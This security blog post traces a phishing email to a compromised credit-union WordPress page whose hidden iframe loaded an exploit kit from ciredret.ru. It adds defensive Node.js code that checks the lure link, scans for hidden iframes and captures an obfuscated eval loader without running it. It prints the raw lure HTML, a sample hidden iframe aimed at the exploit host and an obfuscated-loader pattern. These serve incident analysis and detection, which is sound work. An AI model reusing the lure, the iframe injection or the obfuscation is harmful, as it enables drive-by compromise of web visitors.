Recently a client of mine alerted me to an email that was received by one of their HR staff members. The body of the email is shown below:

Despite having received security awareness training, the staff member clicked on the link thinking it was a document that needed to be reviewed. In actuality, the link led to a compromised website that served malicious code. Fortunately, there were technical controls in place that prevented the user's machine from being compromised, but I thought it would be illuminating to follow the trail of this attack.

Step 1

The email bypassed the client's anti-spam and anti-malware defenses, most likely because the link in the email pointed to a legitimate website rather than a known malicious site, the message came from a well known email provider, and there was little else in the message for content filters to act on. The "Secure Checksum" value and the random-looking query-string parameters in the link are likely varied from message to message so that no two copies match a spam signature. Below is the actual HTML contained in the email, reproduced as it appeared in the raw message. It is quoted-printable encoded: "=3D" stands for "=", and the stray "=" characters inside words (for example "notic=ed") are soft line breaks where the MIME encoder wrapped long lines. The hyperlink is the href attribute of the anchor tag. Notice that the visible link text, "Contract.doc 72kb", claims a Word document while the href actually goes to a .htm page with a long query string; that mismatch is the first thing a suspicious reader, or a mail filter, could have caught.

<html><head></head><body’hmmessage’>After our legal department studied this contract carefully, they’ve notic=ed the following mismatches with our previous arrangements. We’ve compose=d a preliminary variant of the new contract, please study it and make sur=e that all the issues are matching your interests<br><a href=3D”http://mo=neymix.cuna.org/blog/wordpress/wsdno.htm?M0DJ854=3D318L77Y4SFO&3L6=3DG2DG=Z8C9F2O9DV2LFX&99G2R=3DI996N6O9B3WJQ8DVL&FV882F6=3D5CFM197E9&”>Contract.d=oc 72kb</a><br><br><br>With Best Wishes<br>Elvina Riggs<br><br><br>Secure Checksum: 9d08e1116b5<=br> </body></html>
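As an added example that is not part of the original post, the following Node.js code decodes the quoted-printable body above and checks its hyperlink the way a mail filter or an analyst could: it extracts each anchor, compares what the link text claims against where the href actually goes, and flags a long random-looking query string. RAW_BODY is the message body from the post with the quoted-printable soft line breaks ("=" followed by a line ending) restored where extraction had joined the lines; the mangled body tag is left as the post shows it. The list of "document" extensions and the 40-character query threshold are heuristics chosen for this example, not values from the post.

```javascript
// Added example, not code from the original post: decode the quoted-printable
// HTML body from Step 1 and check each hyperlink (link text vs. real target).
// RAW_BODY is the post's message body with the QP soft line breaks restored;
// everything else here (extension list, thresholds) is this example's heuristic.

const RAW_BODY = [
  "<html><head></head><body'hmmessage'>After our legal department studied this contract carefully, they've notic=",
  "ed the following mismatches with our previous arrangements. We've compose=",
  "d a preliminary variant of the new contract, please study it and make sur=",
  "e that all the issues are matching your interests<br><a href=3D\"http://mo=",
  "neymix.cuna.org/blog/wordpress/wsdno.htm?M0DJ854=3D318L77Y4SFO&3L6=3DG2DG=",
  "Z8C9F2O9DV2LFX&99G2R=3DI996N6O9B3WJQ8DVL&FV882F6=3D5CFM197E9&\">Contract.d=",
  "oc 72kb</a><br><br><br>With Best Wishes<br>Elvina Riggs<br><br><br>Secure Checksum: 9d08e1116b5<=",
  "br> </body></html>",
].join("\r\n");

// RFC 2045 quoted-printable: "=" + CRLF is a soft line break (dropped),
// "=XX" is a hex-encoded byte. Bytes are collected and decoded as UTF-8 so
// non-ASCII content in a real message is handled too.
function decodeQuotedPrintable(text) {
  const unwrapped = text.replace(/=\r?\n/g, "");
  const bytes = [];
  for (let i = 0; i < unwrapped.length; i++) {
    const pair = unwrapped.substr(i + 1, 2);
    if (unwrapped[i] === "=" && /^[0-9A-Fa-f]{2}$/.test(pair)) {
      bytes.push(parseInt(pair, 16));
      i += 2;
    } else {
      bytes.push(unwrapped.charCodeAt(i) & 0xff);
    }
  }
  return Buffer.from(bytes).toString("utf8");
}

// Pull every <a href=...>text</a> out of the decoded HTML. Link text is
// stripped of inner tags so "Contract.d<b>oc</b>" would still read as one word.
function extractLinks(html) {
  const links = [];
  const re = /<a\b[^>]*\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))[^>]*>([\s\S]*?)<\/a>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const href = m[1] ?? m[2] ?? m[3];
    const text = m[4].replace(/<[^>]+>/g, "").trim();
    links.push({ href, text });
  }
  return links;
}

// Heuristic list of extensions a lure typically names in its link text.
const DOCUMENT_EXT = /\.(doc|docx|xls|xlsx|ppt|pptx|pdf|rtf|zip)\b/i;

// Compare what the link text claims with what the href actually is.
function checkLink(link) {
  let url;
  try {
    url = new URL(link.href);
  } catch (e) {
    return { ...link, host: null, reasons: ["unparseable href"] };
  }
  const reasons = [];
  const target = url.pathname.split("/").pop() || "/";
  if (DOCUMENT_EXT.test(link.text) && !DOCUMENT_EXT.test(url.pathname)) {
    reasons.push("link text names a document but target is " + target);
  }
  if (/^https?:\/\//i.test(link.text) && !link.text.toLowerCase().includes(url.hostname)) {
    reasons.push("displayed URL differs from target host " + url.hostname);
  }
  if (url.search.length > 40 && /[A-Z0-9]{8,}/.test(url.search)) {
    reasons.push("long random-looking query string (" + url.search.length + " chars), often a per-message token");
  }
  return { ...link, host: url.hostname, reasons };
}

// Decode, extract and check every link in one call.
function analyzeBody(rawQuotedPrintable) {
  return extractLinks(decodeQuotedPrintable(rawQuotedPrintable)).map(checkLink);
}

console.log(JSON.stringify(analyzeBody(RAW_BODY), null, 2));
```

Run with node; the single link in this message is reported with its real host, moneymix.cuna.org, and two reasons: the text says ".doc" while the target is wsdno.htm, and the query string is a long random-looking token. A gateway rule built on the first reason alone would have flagged this message without any reputation data on the destination.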

Step 2

Once the user clicked on the link, they were taken to hxxp://moneymix.cuna.org, a legitimate site operated by the Credit Union National Association, a credit union trade association. Moneymix is a service the association offers to credit unions that sign up for it, supplying social media content for their websites. Attackers had planted a page under the site's WordPress installation (the /blog/wordpress/wsdno.htm path in the link) containing a hidden iframe. An iframe does not visibly redirect the visitor; when the page loaded, the browser silently fetched hxxp://ciredret.ru/main.php in the background while the user saw nothing but an apparently legitimate site.
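The following Node.js code is an added example, not code from the original post or from the Credit Union National Association, showing a first-pass check for the kind of injected iframe described here. It scans raw HTML that has been fetched separately (with curl, or copied from the web server), so nothing is rendered or executed, and reports iframes that point off-site or that are hidden from the visitor: tiny dimensions, display:none or visibility:hidden styling, or off-screen positioning. The sample page is constructed for this example; only the two host names come from the post, and the size and style rules are this example's own thresholds.

```javascript
// Added example, not from the original post: flag injected iframes in a saved
// copy of a page. SAMPLE_HTML is CONSTRUCTED; only the host names are from the
// post. No network access and nothing in the HTML is executed.

const PAGE_HOST = "moneymix.cuna.org";

const SAMPLE_HTML = `
<html><body>
<h1>Credit union news</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<iframe src="/blog/wordpress/widget.htm" width="300" height="250"></iframe>
<iframe src="http://ciredret.ru/main.php" width="1" height="1" style="visibility:hidden" frameborder="0"></iframe>
</body></html>`;

// Parse the attribute text of one tag into a lower-cased name -> value map.
function parseAttributes(attrText) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Resolve a possibly relative src against the page's own host; null if the
// value is not a URL at all (javascript:, data: and the like have no host).
function hostOf(src, pageHost) {
  try {
    return new URL(src, "http://" + pageHost + "/").hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Return every iframe that has at least one suspicious property, with reasons.
function findSuspiciousIframes(html, pageHost) {
  const findings = [];
  const site = pageHost.toLowerCase();
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const a = parseAttributes(m[1]);
    const src = a.src || "";
    const reasons = [];

    // Frame content loaded from another domain. Weak on its own (legitimate
    // embeds do this too), strong in combination with the checks below.
    const host = hostOf(src, pageHost);
    if (host && host !== site && !host.endsWith("." + site)) {
      reasons.push("off-site src: " + host);
    }

    // Exploit-kit frames are typically 0x0 or 1x1 so the visitor never sees them.
    const w = parseInt(a.width, 10);
    const h = parseInt(a.height, 10);
    if ((!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1)) {
      reasons.push("zero/one-pixel size");
    }

    // Or they are hidden, or pushed far off-screen, with inline CSS.
    const style = (a.style || "").replace(/\s+/g, "").toLowerCase();
    if (/display:none|visibility:hidden|opacity:0(?![.\d])/.test(style)) {
      reasons.push("hidden via style");
    }
    if (/(?:left|top):-\d{3,}px/.test(style)) {
      reasons.push("positioned off-screen");
    }

    if (reasons.length > 0) findings.push({ src, reasons });
  }
  return findings;
}

// Demo: the ciredret.ru frame collects three reasons, the YouTube embed one
// (off-site only), and the same-site widget is not reported at all.
console.log(JSON.stringify(findSuspiciousIframes(SAMPLE_HTML, PAGE_HOST), null, 2));
```

In practice the off-site rule needs an allowlist of known embeds (video, analytics, payment widgets), and this check only sees iframes that are present in the static HTML. An iframe that a hidden or obfuscated script writes into the page at load time will not appear here, which is why the script itself has to be analyzed as in Step 3, and why comparing the served page against a known-good copy from source control is the more reliable check for a site owner.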

Step 3

The main.php script contained obfuscated JavaScript that attempted to exploit several potential vulnerabilities on the user's machine. I was able to download the script and analyze it. Scripts like this decode their real payload at run time and then hand it to eval(); by inserting an "alert" statement into the script just prior to that point, the decoded code is displayed instead of executed, which gives a good idea of what the script does. Below is a sample of the output:

The decoded code checks the installed versions of a number of applications, including the browser itself, Java, Flash and Adobe Reader. If it finds a vulnerable version, it attempts to exploit the corresponding vulnerability and compromise the machine, so the victim only has to be behind on one of these updates. This code appears to be very widely used, as I found numerous copies of it on sites such as Pastebin. A more readable version of the above code can be found here. Given that the same script turns up on so many sites, it seems likely that it is part of one of the many commercial exploit kits available on the web, in which the compromised legitimate site serves only as the entry point and the kit's own server does the fingerprinting and exploitation.
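As an added example that is not code from the original post or from the exploit kit it describes, the following Node.js code implements the analysis trick from Step 3: stop the landing script just before it runs its decoded stage and look at the string instead of letting it execute. Rather than editing an alert() into the script, the loader is run inside a wrapper whose eval, document.write and alert are capture hooks, and each captured stage is then grepped for the plugin-fingerprinting and file-type indicators the post describes. The obfuscated loader is constructed here to mimic a common exploit-kit pattern (character codes shifted by a small key, decoded in a loop, passed to eval); it is not the ciredret.ru main.php script, and the indicator patterns are this example's own.

```javascript
// Added example, not from the original post or the exploit kit it describes:
// capture what an obfuscated landing script would eval() without running it.
// makeObfuscatedLoader only produces a CONSTRUCTED, realistic test input.

// Build a loader in a style common to exploit-kit landing pages: the real stage
// is stored as comma-separated character codes shifted by `key`, decoded in a
// loop, and handed to eval().
function makeObfuscatedLoader(stage, key) {
  const codes = Array.from(stage, (ch) => ch.charCodeAt(0) + key).join(",");
  return [
    `var p="${codes}";`,
    `var a=p.split(","),s="";`,
    `for(var i=0;i<a.length;i++){s+=String.fromCharCode(parseInt(a[i],10)-${key});}`,
    "eval(s);",
  ].join("\n");
}

// Run untrusted loader code with eval, document.write and alert replaced by
// hooks that record their argument. The hooks are declared as parameters of
// the wrapper function, so the loader's own direct calls to eval(...) resolve
// to the hook, not the real eval (a parameter named eval is legal in non-strict
// code, which a Function() body is unless it opts in). The decoded stage is
// therefore recorded, never executed. `window` is an empty stand-in.
function captureStages(loaderSource) {
  const captured = [];
  const record = (sink) => (value) => {
    captured.push({ sink, code: String(value) });
  };
  const wrapper = new Function("eval", "document", "window", "alert", loaderSource);
  try {
    wrapper(record("eval"), { write: record("document.write") }, {}, record("alert"));
  } catch (err) {
    captured.push({ sink: "error", code: String(err) });
  }
  return captured;
}

// Strings worth grepping for in a captured stage, matching what Step 3
// describes: plugin fingerprinting and the file types fed to the viewers.
const INDICATORS = {
  "plugin enumeration": /navigator\.plugins|navigator\.mimeTypes|PluginDetect/i,
  "Java": /\.jar\b|\bjava\b|deployJava|JavaPlugin|JavaWebStart/i,
  "Flash": /\.swf\b|Shockwave ?Flash/i,
  "Adobe Reader": /\.pdf\b|AcroPDF|Adobe Acrobat|PDF\.PdfCtrl/i,
  "hidden iframe/object": /<iframe|<object|<embed|<applet/i,
};

function summarizeStage(code) {
  return Object.keys(INDICATORS).filter((name) => INDICATORS[name].test(code));
}

// Capture every stage the loader tries to execute and tag each with indicators.
// If a captured stage is itself another loader, feed it back through this
// function; multi-layer kits unwrap one layer per pass.
function analyzeLanding(loaderSource) {
  return captureStages(loaderSource).map((c) => ({ ...c, indicators: summarizeStage(c.code) }));
}

// Demo with a constructed stage that fingerprints Flash and writes an <object>.
const DEMO_STAGE =
  'var f=navigator.plugins["Shockwave Flash"];document.write("<object data=\'x.swf\'></object>");';
console.log(JSON.stringify(analyzeLanding(makeObfuscatedLoader(DEMO_STAGE, 7)), null, 2));
```

Run with node. The hooks make the analysis safe against a stage that would throw, redirect or load an exploit, because the stage string is only ever stored. The same approach works on a real sample by reading the downloaded main.php into loaderSource; if the script reaches for other browser objects (navigator, location, screen) the wrapper needs stubs for those too, or it will stop with a ReferenceError that is recorded under the "error" sink.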

Conclusion

Based on this research we can draw some conclusions about appropriate countermeasures to address this type of threat. First, user awareness is key, but as this incident shows it is not sufficient on its own: a trained user still clicked. Users must be educated about these types of threats so that they can identify and avoid them, and in particular to check where a link really goes before following it. Second, defense in depth is a must. In this case the client had anti-spam and anti-malware technology on the mail gateway, but this message still made it through because nothing in it was recognizably malicious at delivery time. Additional countermeasures such as a web security gateway or filtering proxy, which can block the background connection to the exploit server even when the first hop is a legitimate site, are also recommended. The last line of defense is the endpoint itself, and in this case it is what stopped the attack. Third, it is important to understand that even legitimate websites can be compromised and used to spread malware. Don't assume that because a site is well known or in a particular industry that it is safe. Lastly, keep your systems patched, including third-party applications such as Java, Flash and Adobe Reader, which are exactly what this exploit kit checks for. The great majority of the exploits carried by kits like this target vulnerabilities for which a patch already exists, so they are useless against a fully patched system.

Note: I contacted the administrators of the Credit Union National Association website to advise them of the fact that their site was compromised. To their credit they removed the offending file very quickly.